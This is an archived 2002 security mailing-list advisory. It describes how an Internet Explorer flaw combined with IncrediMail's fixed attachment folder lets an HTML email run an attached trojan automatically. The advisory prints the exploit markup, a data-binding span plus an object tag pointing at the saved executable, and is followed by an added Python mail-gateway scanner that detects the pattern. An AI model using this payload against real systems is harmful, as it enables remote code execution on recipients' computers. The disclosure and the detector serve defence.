MSIE vulnerability exploitable with IncrediMail

From: Eric Detoisien (eric.detoisien@global-secure.fr)
Date: Fri Mar 15 2002 - 09:33:21 PST

    Hi,
    
    	A Microsoft Internet Explorer vulnerability was found by GreyMagic
    (http://security.greymagic.com/adv/gm001-ie/). With IncrediMail, it's
    possible to gain remote access to a computer.
    
    	IncrediMail automatically saves email attachments in this directory 
    (on Windows 2000 Professional):
    C:\Program Files\IncrediMail\Data\Identities\{42D00B20-479C-11d4-9706-00105A40931C}\Message Store\Attachments
    
    	So if you send an HTML email with the GreyMagic vulnerability and a 
    trojan as an attachment, it will be saved in this directory. 
    
    The HTML mail contains this code:
    
     <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
        <security>
            <exploit>
                <![CDATA[
                <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="C:/Program Files/IncrediMail/Data/Identities/{42D00B20-479C-11d4-9706-00105A40931C}/Message Store/Attachments/trojan.exe"></object>
                ]]>
            </exploit>
        </security>
    </xml> 	
    
    	So, the trojan is executed automatically.
    
    
    Eric DETOISIEN
    Security Consultant
    GLOBAL SECURE
    Tel. : 01-44-70-48-02
    Fax. : 01-44-70-48-49 
    Web  : http://www.global-secure.fr
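
A mail-gateway style check for the pattern described in this message, added here as an example and not part of the original post: it flags HTML parts that bind data as HTML, `<object>` tags whose `codebase` is a local path, and a `codebase` file name that matches an attachment carried by the same message. The rule names, the sample messages, `sample.exe` and the `{GUID-PLACEHOLDER}` path segment are constructed for illustration.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.I)
CODEBASE = re.compile(r"""\bcodebase\s*=\s*(["'])(.*?)\1""", re.I | re.S)
LOCAL_PATH = re.compile(r"\s*(?:[a-z]:[\\/]|file:|\\\\)", re.I)  # drive, file: URL, UNC
HTML_BINDING = re.compile(r"""\bdataformatas\s*=\s*["']?html\b""", re.I)

def scan_message(raw):
    """Return (rule, detail) findings for one raw RFC 822 message (bytes)."""
    msg = message_from_bytes(raw, policy=policy.default)
    attached = {p.get_filename().lower() for p in msg.walk() if p.get_filename()}
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        html = part.get_content()  # decoded text, so CDATA content is scanned too
        if HTML_BINDING.search(html):
            findings.append(("html-data-binding", "dataformatas=html"))
        for tag in OBJECT_TAG.findall(html):
            m = CODEBASE.search(tag)
            if not m or not LOCAL_PATH.match(m.group(2)):
                continue
            path = m.group(2)
            findings.append(("local-codebase", path))
            # Strongest signal: the mail carries the file its markup points at.
            if re.split(r"[\\/]", path)[-1].lower() in attached:
                findings.append(("codebase-is-attachment", path))
    return findings

def build_sample(html, filename=None):
    """Build a constructed test message; the attachment is inert placeholder bytes."""
    msg = EmailMessage()
    msg.set_content(html, subtype="html")
    if filename:
        msg.add_attachment(b"placeholder, not a program", maintype="application",
                           subtype="octet-stream", filename=filename)
    return bytes(msg)

# Constructed sample mirroring the markup quoted in the message above.
SUSPECT_HTML = (
    '<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>'
    '<xml id="oExec"><exploit><![CDATA[<object id="oFile" codebase="C:/Program Files/'
    'IncrediMail/Data/Identities/{GUID-PLACEHOLDER}/Message Store/Attachments/sample.exe">'
    '</object>]]></exploit></xml>')
SUSPECT = build_sample(SUSPECT_HTML, "sample.exe")
BENIGN = build_sample('<p>hi</p><object codebase="http://example.com/a.cab"></object>')
```

`scan_message(SUSPECT)` returns all three findings, while `scan_message(BENIGN)` returns an empty list.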
    



    This archive was generated by hypermail 2b30 : Fri Mar 15 2002 - 14:46:13 PST